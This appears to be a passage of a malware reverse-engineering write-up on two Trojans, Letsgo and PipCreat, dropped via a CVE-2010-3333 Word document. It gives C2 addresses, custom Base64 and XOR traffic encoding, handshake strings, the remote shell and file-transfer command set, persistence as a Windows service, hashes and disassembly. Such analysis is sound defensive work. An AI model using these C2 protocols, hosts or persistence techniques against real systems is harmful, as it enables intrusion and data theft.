Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 10.10.5.200
Subnet Mask . . . . . . . . . . . : 255.0.0.0
Default Gateway . . . . . . . . . : 10.10.10.1
DHCP Server . . . . . . . . . . . : 10.10.10.62
DNS Servers . . . . . . . . . . . : 10.10.10.62
10.10.11.51
Lease Obtained. . . . . . . . . . : Tuesday, June 07, 2011 9:24:12 AM
Lease Expires . . . . . . . . . . : Thursday, June 09, 2011 9:24:12 AM
C:\Documents and Settings\OMITTED\Application Data\Adobe>

Encoding Algorithm

• As I mentioned above, Trojan.Letsgo uses Base64 encoding with a custom alphabet for its network communication.
• This algorithm starts with a custom base alphabet that is further scrambled by a scrambling algorithm.
• The custom base alphabet is actually 65 bytes long and is shown below:

ZYXWVUTSRQPONMLKJIHGFEDCBA9876543210zyxwvutsrqponmlkjihgfedcba-_.

• The other sample of this Trojan (the one that creates mutex name letusgozrmmv0.9 has a slightly different base alphabet:

ZYXWVUTSRQPONMLKJIHGFEDCBA9876543210zyxwvutsrqponmlkjihgfedcba@#|

• The scrambling algorithm consists of these steps:

for (i = 0; i < 65; i++) {
  var1 = encodenum MOD 65
  var2 = intArray[var1] MOD 65
  var3 = alphabetBuff[var2]
  alphabetBuff[var2] = alphabetBuff[i]
  alphabetBuff[i] = var3
  encodenum++
}

• The intArray mentioned above is an array of integers that is calculated at runtime. Both samples of this Trojan produce the same integers so I am listing them (only the first 65) here:

@intArray = ("3141", "5926", "5358", "9793", "2384", "6264", "3383",
             "2795", "288", "4197", "1693", "9937", "5105", "8209",
             "7494", "4592", "3078", "1640", "6286", "2089", "9862",
             "8034", "8253", "4211", "7067", "9821", "4808", "6513",
             "2823", "664", "7093", "8446", "955", "582", "2317", "2535",
             "9408", "1284", "8111", "7450", "2841", "270", "1938", "5211",
             "555", "9644", "6229", "4895", "4930", "3819", "6442", "8810",
             "9756", "6593", "3446", "1284", "7564", "8233", "7867", "8316",
             "5271", "2019", "914", "5648", "5669");

• After this alphabet is scrambled by this algorithm, the first 64 bytes are used for encoding/decoding (it is Base64 after all). So, having 65 bytes to start with, adds a bit more randomness to the alphabet.
• So, to give an example of this, lets look at the first info message from the TAB_MESSAGE above.
  • We have the following encoded message: tCk1tFl1rPkUtCR2_Pl1RW_jK.Y8zlkRzlkRzlkRzlkRzlkRzlkRzlkR
  • We also have the encodnum value: 14517.
• So, we first produce the scrambled alphabet:
  • From the base alphabet: ZYXWVUTSRQPONMLKJIHGFEDCBA9876543210zyxwvutsrqponmlkjihgfedcba-_.
  • We scramble this one: l3zFIMxWROGrt_NbYvpCA60cSigKJD7Lk8h9oj5.wduHX4yV1TUPQ2esqfnBm-aE
• After Base64 decoding the message using the scrambled custom alphabet we get:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   31 38 30 30 30 30 2F 38  32 31 32 35 37 30 30 20   180000/82125700
00000010   73 65 6E 74 21 08 08 08  08 08 08 08 08 08 08 08   sent!
00000020   08 08 08 08 08 08 08 08  08 08

• As I mentioned before, when I saw this I knew a file was being transferred and the victim was updating the C2 node on the progress of the transfer.

• As promised here is a string dump from update.exe:

Text strings referenced in update:.text
Address      Disassembly                   Text string
00401018     MOV EDI, update.00408020      ASCII "Content-Type: application/x-www-form-urlencoded"
00401402     PUSH update.0040805C          ASCII "https"
0040144B     PUSH update.00408054          ASCII "http"
00401568     PUSH update.00408064          ASCII "Mozilla/4.0 (compatible; )"
00401628     MOV DWORD PTR SS:[ESP+1C], u  ASCII "*/*"
0040168E     PUSH update.00408094          ASCII "HTTP/1.0"
00401694     PUSH update.00408090          ASCII "GET"
004016B6     MOV EDI, update.00408080      ASCII "Accept: */*"
004016CB     PUSH update.00408080          ASCII "Accept: */*"
004017D8     MOV DWORD PTR SS:[ESP+1C], u  ASCII "*/*"
00401854     PUSH update.00408094          ASCII "HTTP/1.0"
0040185D     PUSH update.004080A4          ASCII "POST"
0040187F     MOV EDI, update.00408080      ASCII "Accept: */*"
0040189A     PUSH update.00408080          ASCII "Accept: */*"
004019CF     MOV DWORD PTR SS:[ESP+20], u  ASCII "*/*"
00401A58     PUSH update.00408094          ASCII "HTTP/1.0"
00401A5E     PUSH update.004080A4          ASCII "POST"
00401A80     MOV EDI, update.00408080      ASCII "Accept: */*"
00401A95     PUSH update.00408080          ASCII "Accept: */*"
00401B1F     PUSH update.004080AC          ASCII "Content-Length: %d"
00401E52     PUSH update.004080D0          ASCII "%d:%s %d    "
00401F8D     PUSH update.004080DC          ASCII 0A,"     Execu"
0040216B     PUSH update.00408100          ASCII "USERPROFILE"
00402179     PUSH update.004080F8          ASCII "windir"
0040225B     PUSH update.00408124          ASCII "%s\"
00402262     MOV EDI, update.0040811C      ASCII "\*.*"
00402336     PUSH update.00408114          ASCII "%s\%s"
00402369     PUSH update.0040810C          ASCII "%s\%s"
0040246E     PUSH update.00408190          ASCII "InternetQueryOption failed! (%d)"
00402481     PUSH update.0040818C          ASCII "%s"
004024A2     PUSH update.0040816C          ASCII "PROXY_TYPE_AUTO_PROXY_URL:%s"
004024C1     PUSH update.00408154          ASCII "PROXY_TYPE_AUTO_DETECT"
004024DC     PUSH update.00408140          ASCII "PROXY_TYPE_PROXY:%s"
004024F8     PUSH update.0040812C          ASCII "PROXY_TYPE_DIRECT"
004025EF     MOV EDI, update.004081C0      ASCII "\cmd.exe"
00402627     MOV EDI, update.004081B4      ASCII "rusinfo.exe"
00402776     PUSH update.004081E0          ASCII "w+t"
0040277B     PUSH update.004081D8          ASCII "CONOUT$"
00402789     PUSH update.004081D4          ASCII "r+t"
0040278E     PUSH update.004081CC          ASCII "CONIN$"
004027E1     PUSH update.004081F4          ASCII "/c del "
00402809     PUSH update.004081EC          ASCII " >> NUL"
0040281B     PUSH update.004081E4          ASCII "ComSpec"
00402AAA     PUSH update.00408204          ASCII "%.4d"
00402F0E     PUSH update.004082A0          ASCII "AAAAA"
00402F13     PUSH update.00408274          ASCII "http://202.105.39.39/safe/1.asp"
00402F29     PUSH update.0040825C          ASCII "letusgohtppmmv2.0.0.1"
00402F84     MOV ESI, update.00408258      ASCII "-c"
00402FE6     PUSH update.00408228          ASCII "Are you sure to FORMAT Disk C With NTFS?(Y/N)"
00403003     PUSH update.00408220          ASCII "%[^]"
00403011     MOV ESI, update.0040821C      ASCII "yes"
004030CB     PUSH update.00408214          ASCII "exit"
0040312F     PUSH update.00408314          ASCII "%Y/%m/%d %X %z"
004031B4     PUSH update.0040830C          ASCII "mname"
004031BE     PUSH update.00408304          ASCII "shell"
0040328C     MOV ESI, update.00408304      ASCII "shell"
0040333C     MOV EDI, update.00408300      ASCII ""
0040339E     MOV EDI, update.004082F8      ASCII "reshell"
00403432     MOV EDI, update.00408300      ASCII ""
00403492     MOV ESI, update.004082F0      ASCII "listp"
004034F8     PUSH update.0040830C          ASCII "mname"
00403520     PUSH update.004082E8          ASCII "info"
00403532     MOV ESI, update.004082E0      ASCII "killp"
00403592     MOV ESI, update.004082D8      ASCII "printf"
00403609     PUSH update.0040830C          ASCII "mname"
00403622     PUSH update.004082E8          ASCII "info"
0040362F     MOV ESI, update.004082D0      ASCII "runfile"
00403675     MOV ESI, update.004082C4      ASCII "filectos"
004036CB     MOV ESI, update.004082B8      ASCII "filestoc"
00403721     MOV ESI, update.004082B0      ASCII "remove"
00403767     MOV ESI, update.004082A8      ASCII "sleep"

00403AFF     PUSH update.0040865C          ASCII "select top 1 * from tab_file where filename='%s' order by id as
00403B8E     PUSH update.00408658          ASCII "rb+"
00403BA5     PUSH update.00408654          ASCII "wb+"
00403BE6     PUSH update.00408610          ASCII "select * from tab_file where filename='%s' and filepieceindex=%
00403CED     PUSH update.004085DC          ASCII 0A,"Down file "
00403D1C     PUSH update.004085D0          ASCII "net error!"
00403D59     PUSH update.004085B4          ASCII "piece %d not found error!"
00403D84     PUSH update.004085A0          ASCII "Cant open file!"
00403DD9     MOV EDI, update.00408718      ASCII "file"
00403DED     PUSH update.00408658          ASCII "rb+"
00403F07     PUSH update.004086D4          ASCII "select id from tab_file where filename='%s' and filepieceindex=
00403F30     PUSH update.00408498          ASCII ""
00403F35     PUSH update.0040847C          ASCII ""
00403F8A     PUSH update.004086A0          ASCII 0A,"Send file "
00403FAF     PUSH update.004085A0          ASCII "Cant open file!"
00403FDE     PUSH update.00408720          ASCII "%s"
00404009     PUSH update.004082E8          ASCII "info"
0040401E     PUSH update.004082E8          ASCII "info"
00404082     PUSH update.00408724          ASCII "select top 1 * from tab_message where toid = '%s' order by id a
00404172     PUSH update.00408768          ASCII "insert into tab_message (messageaction,fromid,toid,encodenum,me
0040420A     PUSH update.00408828          ASCII "insert into tab_file (encodenum,filetotallength,filepiecelength
00404280     PUSH update.00408720          ASCII "%s"
00404297     PUSH update.00408720          ASCII "%s"
004042AB     PUSH update.004088C0          ASCII "%d"
004042C2     PUSH update.004088C0          ASCII "%d"
004042D9     PUSH update.004088C0          ASCII "%d"
004042F8     PUSH update.00408720          ASCII "%s"
00404309     PUSH update.00408720          ASCII "%s"
00404360     PUSH update.004088C0          ASCII "%d"
00404494     PUSH update.004089C4          ASCII "%d-%02d-%02d %02d:%02d:%02d"
004044A8     PUSH update.00408984          ASCII "select id from tab_online where regcode = '%s' order by id asc"
004044D7     PUSH update.00408498          ASCII ""
004044DC     PUSH update.0040847C          ASCII ""
00404517     PUSH update.00408984          ASCII "select id from tab_online where regcode = '%s' order by id asc"
00404566     PUSH update.00408900          ASCII "insert into tab_online (mode,clientname,clientip,accessip,onlin
004045A1     PUSH update.00408984          ASCII "select id from tab_online where regcode = '%s' order by id asc"
004045CB     PUSH update.00408498          ASCII ""
004045D0     PUSH update.0040847C          ASCII ""
00404655     PUSH update.004088C4          ASCII "update tab_online set lasttime = '%s' where regcode = '%s'"
00404728     PUSH update.00408A10          ASCII "rands=%s&acc=%s&str=%s"
00404761     PUSH update.00408274          ASCII "http://202.105.39.39/safe/1.asp"
00404766     PUSH update.00408A08          ASCII "%s?%s"
004047A4     PUSH update.004089E8          ASCII "id="param1" size="100" value=""
004047BA     MOV ESI, update.004089E0      ASCII "acc ok"
004048D6     PUSH update.00408274          ASCII "http://202.105.39.39/safe/1.asp"
004048E1     PUSH update.00408A30          ASCII "%s?rands=%s&acc=%s"
004048F3     PUSH update.00408A28          ASCII "str=%s"
0040495F     PUSH update.004089E8          ASCII "id="param1" size="100" value=""
00404975     MOV ESI, update.004089E0      ASCII "acc ok"
00404A7D     MOV EDI, update.00408274      ASCII "http://202.105.39.39/safe/1.asp"
00404AC7     MOV EDI, update.00408A6C      ASCII "?rands="
00404B57     PUSH update.00408A58          ASCII "id="param4" value=""
00404B73     PUSH update.00408A44          ASCII "id="param5" value=""
00404EC5     PUSH update.00408BF8          ASCII "select * from tab_online where id=%s"
00404EDA     PUSH update.00408BCC          ASCII "select * from tab_online order by id asc"
00404F1F     PUSH update.00408498          ASCII ""
00404F24     PUSH update.0040847C          ASCII ""
00404F45     PUSH update.00408BC4          ASCII "id:%s"
00404F51     PUSH update.00408BC0          ASCII "%s    "
00404F60     PUSH update.00408498          ASCII ""
00404F65     PUSH update.00408BA4          ASCII ""
00404F86     PUSH update.00408B98          ASCII "mode:%s"
00404F92     PUSH update.00408BC0          ASCII "%s    "
00404FA1     PUSH update.00408498          ASCII ""
00404FA6     PUSH update.00408B74          ASCII ""
00404FC7     PUSH update.00408B64          ASCII "clientname:%s"
00404FD6     PUSH update.00408498          ASCII ""
00404FDB     PUSH update.00408B44          ASCII ""
00404FF8     PUSH update.00408B34          ASCII "clientip:%s"
00405007     PUSH update.00408498          ASCII ""
0040500C     PUSH update.00408B14          ASCII ""
0040502D     PUSH update.00408B04          ASCII "accessip:%s"
00405039     PUSH update.00408BC0          ASCII "%s    "
00405045     PUSH update.00408BC0          ASCII "%s    "
00405054     PUSH update.00408498          ASCII ""
00405059     PUSH update.00408AE0          ASCII ""
0040507A     PUSH update.00408AD0          ASCII "onlinetime:%s"
00405089     PUSH update.00408498          ASCII ""
0040508E     PUSH update.00408AB0          ASCII ""
004050A7     PUSH update.00408AA0          ASCII "lasttime:%s"
004050B3     PUSH update.00408498          ASCII ""
004050B8     PUSH update.00408A80          ASCII ""
004050D1     PUSH update.00408A74          ASCII "regcode:%s"
004050E5     PUSH update.0040818C          ASCII "%s"
00405171     PUSH update.00408C44          ASCII "delete from tab_online"
00405187     PUSH update.00408C20          ASCII "delete from tab_online where id=%s"
00405221     PUSH update.00408C80          ASCII "delete from tab_message"
00405237     PUSH update.00408C5C          ASCII "delete from tab_message where id=%s"
004052D1     PUSH update.00408CC4          ASCII "delete from tab_file"
004052E7     PUSH update.00408C98          ASCII "delete from tab_file where filename='%s'"
00405355     PUSH update.00408DA4          ASCII "select * from tab_message where id=%s"
0040536A     PUSH update.00408D78          ASCII "select * from tab_message order by id asc"
004053C1     PUSH update.00408498          ASCII ""
004053C6     PUSH update.0040847C          ASCII ""
004053E7     PUSH update.00408BC4          ASCII "id:%s"
004053F3     PUSH update.00408BC0          ASCII "%s    "
00405402     PUSH update.00408498          ASCII ""
00405407     PUSH update.00408454          ASCII ""
00405428     PUSH update.00408D64          ASCII "messageaction:%s"
00405434     PUSH update.00408BC0          ASCII "%s    "
00405443     PUSH update.00408498          ASCII ""
00405448     PUSH update.00408434          ASCII ""
00405469     PUSH update.00408D58          ASCII "fromid:%s"
00405475     PUSH update.00408D50          ASCII "%s->"
00405484     PUSH update.00408498          ASCII ""
00405489     PUSH update.00408418          ASCII ""
004054AE     PUSH update.00408D44          ASCII "toid:%s"
004054BD     PUSH update.00408498          ASCII ""
004054C2     PUSH update.004083F4          ASCII ""
004054DF     PUSH update.00408D34          ASCII "encodenum:%s"
004054F8     PUSH update.00408498          ASCII ""
004054FD     PUSH update.004083C8          ASCII ""
0040551A     PUSH update.00408D1C          ASCII "messagetotallength:%s"
00405526     PUSH update.00408498          ASCII ""
0040552B     PUSH update.0040839C          ASCII ""
00405548     PUSH update.00408D04          ASCII "messagepiecelength:%s"
00405557     PUSH update.00408498          ASCII ""
0040555C     PUSH update.00408370          ASCII ""
00405579     PUSH update.00408CEC          ASCII "messagepieceindex:%s"
00405585     PUSH update.00408BC0          ASCII "%s    "
00405591     PUSH update.00408BC0          ASCII "%s    "
004055A0     PUSH update.00408498          ASCII ""
004055A5     PUSH update.00408324          ASCII ""
004055C2     PUSH update.00408CDC          ASCII "messagename:%s"
004055D6     PUSH update.0040818C          ASCII "%s"
00405665     PUSH update.00408EF0          ASCII "select filename,filetotallength,filepiecelength,filepieceindex
0040567F     PUSH update.00408EB8          ASCII "select distinct filename,filetotallength from tab_file"
004056D9     PUSH update.00408498          ASCII ""
004056DE     PUSH update.00408E98          ASCII ""
004056FB     PUSH update.00408E88          ASCII "filename:%s    "
00405707     PUSH update.00408498          ASCII ""
0040570C     PUSH update.00408E60          ASCII ""
00405729     PUSH update.00408E50          ASCII "filelength:%s    "
00405735     PUSH update.00408498          ASCII ""
0040573A     PUSH update.00408E28          ASCII ""
00405757     PUSH update.00408E14          ASCII "filepiecelength:%s    "
00405763     PUSH update.00408498          ASCII ""
00405768     PUSH update.00408DEC          ASCII ""
00405781     PUSH update.00408DDC          ASCII "filepiece:%s"
0040579F     PUSH update.00408498          ASCII ""
004057A4     PUSH update.00408E98          ASCII ""
004057BD     PUSH update.00408E88          ASCII "filename:%s    "
004057C9     PUSH update.00408498          ASCII ""
004057CE     PUSH update.00408E60          ASCII ""
004057E7     PUSH update.00408DCC          ASCII "filelength:%s"
00405832     PUSH update.004090B4          ASCII "Alert!Pls press enter to make sure!"
0040584F     PUSH update.00408220          ASCII "%[^]"
0040585D     MOV ESI, update.004090AC      ASCII "enter"
004058CB     PUSH update.004090A8          ASCII "$"
004058F8     PUSH update.00408220          ASCII "%[^]"
0040597C     MOV ESI, update.004090A4      ASCII "cls"
004059B0     PUSH update.004090A4          ASCII "cls"
004059C3     MOV ESI, update.00409098      ASCII "listclients"
004059FB     MOV ESI, update.00409094      ASCII "lcs"
00405A33     MOV ESI, update.00409084      ASCII "listmessages"
00405A6B     MOV ESI, update.00409080      ASCII "lms"
00405AA3     MOV ESI, update.00409074      ASCII "listfiles"
00405ADB     MOV ESI, update.00409070      ASCII "lfs"
00405B13     MOV ESI, update.00409064      ASCII "delclient"
00405B4B     MOV ESI, update.0040905C      ASCII "delc"
00405B83     MOV ESI, update.00409050      ASCII "delmessage"
00405BBB     MOV ESI, update.00409048      ASCII "delm"
00405BF3     MOV ESI, update.00409040      ASCII "delfile"
00405C2B     MOV ESI, update.00409038      ASCII "delf"
00405C63     MOV ESI, update.0040902C      ASCII "debugfile"
00405C9B     MOV ESI, update.00409024      ASCII "dbgf"
00405CD3     MOV ESI, update.00409018      ASCII "debugclient"
00405D0B     MOV ESI, update.00409010      ASCII "dbgc"
00405D43     MOV ESI, update.00409000      ASCII "debugmessage"
00405D7B     MOV ESI, update.00408FF8      ASCII "dbgm"
00405DB3     MOV ESI, update.00408FF0      ASCII "connect"
00405DEB     MOV ESI, update.00408FEC      ASCII "con"
00405E23     MOV ESI, update.00408FE4      ASCII "quitz"
00405E5B     MOV ESI, update.00408FDC      ASCII "quit"
00405E93     MOV ESI, update.00408FD4      ASCII "upfile"
00405ECB     MOV ESI, update.00408FD0      ASCII "uf"
00405F03     MOV ESI, update.00408FC4      ASCII "downfile"
00405F3B     MOV ESI, update.00408FC0      ASCII "df"
00405F84     PUSH update.00408FA4          ASCII "Pls choose target first! "
00405F97     MOV ESI, update.004082A8      ASCII "sleep"
00405FFE     PUSH update.004082A8          ASCII "sleep"
00406010     MOV ESI, update.00408F9C      ASCII "getfile"
00406048     MOV ESI, update.00408F98      ASCII "gf"
00406080     MOV ESI, update.00408F90      ASCII "putfile"
004060B8     MOV ESI, update.00408F8C      ASCII "pf"
004060F0     MOV ESI, update.00408F80      ASCII "uninstall"
00406128     MOV ESI, update.004082B0      ASCII "remove"
00406160     MOV ESI, update.00408304      ASCII "shell"
0040619E     PUSH update.00408304          ASCII "shell"
004061A3     PUSH update.00408F7C          ASCII "cd"
004061AD     PUSH update.00408304          ASCII "shell"
004061B4     MOV ESI, update.004082F8      ASCII "reshell"
004061F2     PUSH update.004082F8          ASCII "reshell"
004061F7     PUSH update.00408F7C          ASCII "cd"
00406201     PUSH update.004082F8          ASCII "reshell"
0040621D     MOV ESI, update.004082F0      ASCII "listp"
0040625B     PUSH update.004082F0          ASCII "listp"
00406260     PUSH update.00408F7C          ASCII "cd"
0040626A     PUSH update.004082F0          ASCII "listp"
0040627C     MOV ESI, update.004082D8      ASCII "printf"
004062D3     PUSH update.004082D8          ASCII "printf"
004062E7     PUSH update.004082D8          ASCII "printf"
004062F9     MOV ESI, update.004082D0      ASCII "runfile"
00406350     PUSH update.004082D0          ASCII "runfile"
00406364     PUSH update.004082D0          ASCII "runfile"
00406376     MOV ESI, update.004082E0      ASCII "killp"
004063C9     PUSH update.004082E0          ASCII "killp"
004063DD     PUSH update.004082E0          ASCII "killp"
004063EF     PUSH update.00408F6C          ASCII "Command Error! "
0040640A     MOV ESI, update.00408F64      ASCII "exit"
00406461     PUSH update.00408304          ASCII "shell"
0040646B     PUSH update.00408304          ASCII "shell"
00406487     PUSH update.004082B0          ASCII "remove"
0040648C     PUSH update.004082B0          ASCII "remove"
00406496     PUSH update.004082B0          ASCII "remove"
004064E0     PUSH update.004082B8          ASCII "filestoc"
00406532     PUSH update.004082C4          ASCII "filectos"
004067E6     MOV ESI, update.00408304      ASCII "shell"
00406824     PUSH update.00408720          ASCII "%s"
00406843     PUSH update.004090D8          ASCII "(info)%s->%s:%s $"
0040693D up  PUSH EBP                      (Initial CPU selection)
00406A60     PUSH 30000                    ASCII "Actx "
00406A65     PUSH 10000                    UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users"

• Today I will take a look at a Trojan that was dropped from a malicious Word document with the following characteristics:

File Name:  SKY Perfect JSAT Launches ExBird Satellite IP Network Service.doc
File Size:  160822 bytes
MD5:        ab35199de232bfbb99a676cf881e9a85
SHA1:       b9953ca586709bf6ddb98fe0c2d164f9f48f02e9

• There is nothing too interesting with the document, just the normal stuff as it is an old exploit (CVE-2010-3333).
• The only thing worth mentioning perhaps is an 8 byte pattern that serves as a marker, and that the shellcode uses to locate relevant data within the carrier file.
• This pattern is located at file-offset 0x1A200 of the carrier file:

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

0001A200   50 64 50 44 EF FE EA AE                            PdPDïþê®

• The Trojan that is dropped on the system when the carrier file is opened has the following characteristics:

File Name:  LOGIN.EXE
File Path:  C:\Documents and Settings\username\Local Settings\Temp
File Size:  16896 bytes
MD5:        f09d832bea93cf320986b53fce4b8397
SHA1:       df0d7583a0909c61535df01dc5188547649bc6e4
PE Time:    0x4DBFA42D [Tue May 03 06:43:57 2011 UTC]
AV:         10/42 (23.8%) [VirusTotal]
Sections (3):
 Name      Entropy  MD5
 .text     5.56     caa26fd73931d1e8cbde27775befaa13
 .rdata    4.03     0fddf4e4048532895c129f78efdc32b3
 .data     5.04     734de5f9857d81bc4776770e3e2c1e81

• When this Trojan is executed the following relevant behavior was observed:
  • Attempts to create file: “C:\windows\system32 \browseui.dll” (notice the extra space after system32).  This attempt fails because the path is incorrect.
  • Attempts to create file: “C:\windows\system32\dmdskngr.dll“.  This attempt is successful.
  • The Trojan then writes the the data starting from file-offset 0xE00 of login.exe into the newly created file.  This data is not obfuscated in any way.
  • The Trojan then attempts to check the status of file: “C:\windows\system32\dmdskngr.dll\ipxmontr.dll“.  This file also does not exist.  This is another programming mistake as the author probably intended to check “C:\windows\system32\ipxmontr.dll” so that it could retrieve this file’s timestamps and apply them to dmdskngr.dll.  However, because of the mistake the timestamps of dmdskngr.dll are not backdated.
  • Next, login.exe takes care of the entrenchment of the DLL as a service.  The service information is shown below:
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4
    • Description (notice the misspelled words): Service that offers Security network whith Outlook Express. It shuodn’t be stopped unless Special service needed or you known how to contrl.
    • DisplayName: Network Provider Service
    • ServiceDLL: C:\windows\system32\dmdskngr.dll
  • The newly created service is then started.

ANALYSIS OF dmdskngr.dll (Trojan.PipCreat)

• File dmdskngr.dll has the following characteristics:

File Name:  dmdskngr.dll
File Size:  12288 bytes
MD5:        d6de06add6aba572aed7309c9368c859
SHA1:       628bf3079e348cbe356a67c7aceb96ce4723df2d
PE Time:    0x4DBFA411 [Tue May 03 06:43:29 2011 UTC]
AV:         3/42 (7.1%) [VirusTotal]
Sections (5):
 Name      Entropy  MD5
 .text     5.83     2c248cb35fe323f911408e42cce61083
 .rdata    4.48     c1274124487594363fad0a809036ec3a
 .data     3.18     b3f9e4e01b6e11bd7da327d8952b7a17
 .rsrc     2.62     b79434a52eae91f7d67cb1dd6a7c5f49
 .reloc    4.33     15ca6d08c81195524e30e1bf0c0c7b20

• This Trojan beacons to: jennifer98.lookin.at and 196.44.49.154 over TCP port 8500.
• All network traffic is obfuscated using a single byte XOR with 0x3F.
• It is the C2 node that will start transmitting data first by sending the following string:

00000000   61 72 65 20 79 6F 75 20  74 68 65 72 65 21 40 23   are you there!@#
00000010   24 25 5E 26 2A 28 29 5F  2B 00                       $%^&*()_+.

• The Trojan replies with:

00000000   30 30 6B 00                                        00k

• Followed by system information and the hardcoded string: 0526w

00000000   30 00 35 00 32 00 36 00  77 00 00 00 00 00 00 00   0 5 2 6 w      
00000010   00 00 00 00 76 00 69 00  63 00 74 00 69 00 6D 00       v i c t i m
00000020   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000030   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000040   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000050   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000060   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000070   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000080   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000090   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000A0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000B0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000C0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000D0   00 00 00 00 00 00 00 00  00 00 00 00 31 00 39 00               1 9
000000E0   32 00 2E 00 31 00 36 00  38 00 2E 00 31 00 2E 00   2 . 1 6 8 . 1 .
000000F0   31 00 30 00 30 00 00 00  00 00 00 00 00 00 00 00   1 0 0          
00000100   00 00 00 00 57 00 69 00  6E 00 58 00 70 00 20 00       W i n X p  
00000110   53 00 50 00 33 00 00 00  00 00 00 00 00 00 00 00   S P 3          
00000120   00 00 00 00 00 00 00 00  00 00 00 00 32 00 30 00               2 0
00000130   31 00 31 00 2D 00 30 00  36 00 2D 00 30 00 32 00   1 1 - 0 6 - 0 2
00000140   20 00 31 00 33 00 3A 00  35 00 34 00 00 00 00 00     1 3 : 5 4    
00000150   00 00 00 00 E4 04 00 00                                ä

• The Trojan is controlled through a number of integer commands that occupy the first DWORD of the data from the C2 node.
• The commands from the C2 node are expected to be received in a 4098 block of data.
• The commands are listed below:

02000000 -> Process List
03000000 -> Kill a process
04000000 -> Download a file (from C2 to victim)
05000000 -> Uninstall (cleanup is done)
06000000 -> Remote shell
08000000 -> Execute a file

• Here is the jump table where the commands are processed:

10001445    48                    DEC EAX
10001446    48                    DEC EAX
10001447    0F84 B8000000         JE dmdskngr.10001505                              ; 02 -> PROCESS LIST
1000144D    48                    DEC EAX
1000144E    0F84 8B000000         JE dmdskngr.100014DF                              ; 03 -> PROCESS KILL
10001454    48                    DEC EAX
10001455 >  74 6B                 JE SHORT dmdskngr.100014C2                        ; 04 -> UPLOAD FILE
10001457    48                    DEC EAX
10001458    74 4B                 JE SHORT dmdskngr.100014A5                        ; 05 -> UNINSTALL TROJAN
1000145A    48                    DEC EAX
1000145B    74 2B                 JE SHORT dmdskngr.10001488                        ; 06 -> REMOTE SHELL
1000145D    48                    DEC EAX
1000145E  ^ 0F84 70FFFFFF         JE dmdskngr.100013D4                              ; 07 -> DO NOTHING
10001464    48                    DEC EAX
10001465    0F85 B7000000         JNZ dmdskngr.10001522                            
1000146B    8BC3                  MOV EAX, EBX
1000146D    8DB5 FCEFFFFF         LEA ESI, DWORD PTR SS:[EBP-1004]
10001473    E8 880E0000           CALL dmdskngr.10002300
10001478    B9 00040000           MOV ECX, 400
1000147D    8BFC                  MOV EDI, ESP
1000147F    F3:A5                 REP MOVS DWORD PTR ES:[EDI], DWORD PTR DS:[ESI]
10001481    E8 79090000           CALL dmdskngr.10001DFF                            ; 08 -> EXECUTE FILE
10001486    EB 72                 JMP SHORT dmdskngr.100014FA

• Here is a dump of some of the strings found in this DLL:

Text strings referenced in dmdskngr:.text
Address        Disassembly                     Text string
1000100F       MOV ESI, dmdskngr.100043C0      UNICODE "6to4"
10001182       MOV ESI, dmdskngr.1000409C      ASCII "recv"
1000127E       PUSH dmdskngr.100040AC          UNICODE "ws2_32.dll"
10001349       PUSH dmdskngr.10004028          ASCII "jennifer98.lookin.at"
1000135B       PUSH dmdskngr.1000405C          ASCII "196.44.49.154"
10001373       MOV ESI, dmdskngr.100045C8      UNICODE "0526w"
10001446       DEC EAX                         (Initial CPU selection)
10001528       MOV EDI, dmdskngr.100040C4      ASCII "exit
"
10001622       PUSH dmdskngr.100040D0          ASCII "are you there!@#$%^&*()_+"
10001677       PUSH dmdskngr.100040CC          ASCII "00k"
100016D8       PUSH dmdskngr.10004014          UNICODE "0526w"
100016DD       PUSH dmdskngr.100045C8          UNICODE "0526w"
100017A1       PUSH dmdskngr.100046A4          UNICODE "192.168.1.100"
100017DD       PUSH dmdskngr.100045DC          UNICODE "victim"
10001886       PUSH dmdskngr.10004194          UNICODE "Not find"
10001899       PUSH dmdskngr.10004188          UNICODE "WinNT"
100018C0       PUSH dmdskngr.10004178          UNICODE "Win2000"
100018E2       PUSH dmdskngr.1000416C          UNICODE "WinXp"
10001904       PUSH dmdskngr.1000415C          UNICODE "Win2003"
1000191D       PUSH dmdskngr.10004140          UNICODE "Vista|08|Win7"
1000192D       PUSH dmdskngr.10004138          UNICODE " SP"
10001950       PUSH dmdskngr.1000412C          UNICODE "%s%d"
10001984       PUSH dmdskngr.1000411C          UNICODE "Win Me"
1000198B       PUSH dmdskngr.1000410C          UNICODE "Win 98"
10001992       PUSH dmdskngr.100040FC          UNICODE "Win 95"
10001999       PUSH dmdskngr.100040EC          UNICODE "Win 32"
100019B6       PUSH dmdskngr.100046CC          UNICODE "WinXp SP3"
100019D1       PUSH dmdskngr.100041E8          ASCII "NtQuerySystemInformation"
100019D6       PUSH dmdskngr.100041DC          UNICODE "ntdll"
10001A42       PUSH dmdskngr.100041A8          UNICODE "%04d-%02d-%02d %02d:%02d"
10001A47       PUSH dmdskngr.100046F4          UNICODE "2011-06-02 17:50"
10001AA5       PUSH 10010                      UNICODE "PROFILE=C:\Documents and Settings\All Users"
10001AAA       PUSH dmdskngr.100043C0          UNICODE "6to4"
10001AFD       PUSH dmdskngr.10004224          UNICODE "\dmdskngr.dll"
10001B18       PUSH dmdskngr.10004204          UNICODE "\dmdsknngr.dll"
10001C83       PUSH dmdskngr.10004268          UNICODE "success kill process ok"
10001C8C       PUSH dmdskngr.10004240          UNICODE "failed kill process"
10001DBF       PUSH dmdskngr.100042B8          UNICODE "file recv ok"
10001DD3       PUSH dmdskngr.10004298          UNICODE "file recv error"
10001E09       PUSH dmdskngr.1000430C          UNICODE "open"
